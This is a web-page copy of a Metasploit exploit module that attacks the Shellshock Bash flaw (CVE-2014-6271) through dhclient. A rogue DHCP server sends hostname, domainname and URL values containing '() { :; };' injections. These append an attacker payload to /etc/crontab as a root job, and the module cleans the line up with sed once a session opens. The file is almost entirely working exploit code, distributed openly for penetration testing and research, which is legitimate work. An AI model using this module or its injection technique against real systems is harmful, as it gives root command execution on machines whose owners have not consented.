Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/dhcp/bash_environment.rb
19611 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::DHCPServer
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Dhclient Bash Environment Variable Injection (Shellshock)',
16
'Description' => %q{
17
This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
18
handles external environment variables. This module targets dhclient by responding
19
to DHCP requests with a malicious hostname, domainname, and URL which are then
20
passed to the configuration scripts as environment variables, resulting in code
21
execution. Due to length restrictions and the unusual networking scenario at the
22
time of exploitation, this module achieves code execution by writing the payload
23
into /etc/crontab and then cleaning it up after a session is created.
24
},
25
'Author' => [
26
'Stephane Chazelas', # Vulnerability discovery
27
'egypt' # Metasploit module
28
],
29
'License' => MSF_LICENSE,
30
'Platform' => ['unix'],
31
'Arch' => ARCH_CMD,
32
'References' => [
33
[ 'CVE', '2014-6271' ],
34
[ 'CWE', '94' ],
35
[ 'OSVDB', '112004' ],
36
[ 'EDB', '34765' ],
37
[ 'URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/' ],
38
[ 'URL', 'https://seclists.org/oss-sec/2014/q3/649' ],
39
[ 'URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/' ]
40
],
41
'Payload' => {
42
# 255 for a domain name, minus some room for encoding
43
'Space' => 200,
44
'DisableNops' => true,
45
'Compat' => {
46
'PayloadType' => 'cmd',
47
'RequiredCmd' => 'generic telnet ruby'
48
}
49
},
50
'Targets' => [ [ 'Automatic Target', {}] ],
51
'DefaultTarget' => 0,
52
'DisclosureDate' => '2014-09-24',
53
'Notes' => {
54
'Stability' => [CRASH_SAFE],
55
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
56
'Reliability' => [REPEATABLE_SESSION],
57
'AKA' => ['Shellshock']
58
}
59
)
60
)
61
62
deregister_options('DOMAINNAME', 'HOSTNAME', 'URL')
63
64
self.needs_cleanup = true
65
end
66
67
def on_new_session(session)
68
print_status 'Cleaning up crontab'
69
# XXX this will brick a server some day
70
session.shell_command_token("sed -i '/^\\* \\* \\* \\* \\* root/d' /etc/crontab")
71
end
72
73
def exploit
74
hash = datastore.copy
75
# Quotes seem to be completely stripped, so other characters have to be
76
# escaped
77
p = payload.encoded.gsub(/([<>()|'&;$])/) { |s| Rex::Text.to_hex(s) }
78
echo = "echo -e #{(Rex::Text.to_hex('*') + ' ') * 5}root #{p}>>/etc/crontab"
79
hash['DOMAINNAME'] = "() { :; };#{echo}"
80
if hash['DOMAINNAME'].length > 255
81
raise ArgumentError, 'payload too long'
82
end
83
84
hash['HOSTNAME'] = "() { :; };#{echo}"
85
hash['URL'] = "() { :; };#{echo}"
86
start_service(hash)
87
88
sleep 2 while @dhcp.thread.alive?
89
end
90
end
91
92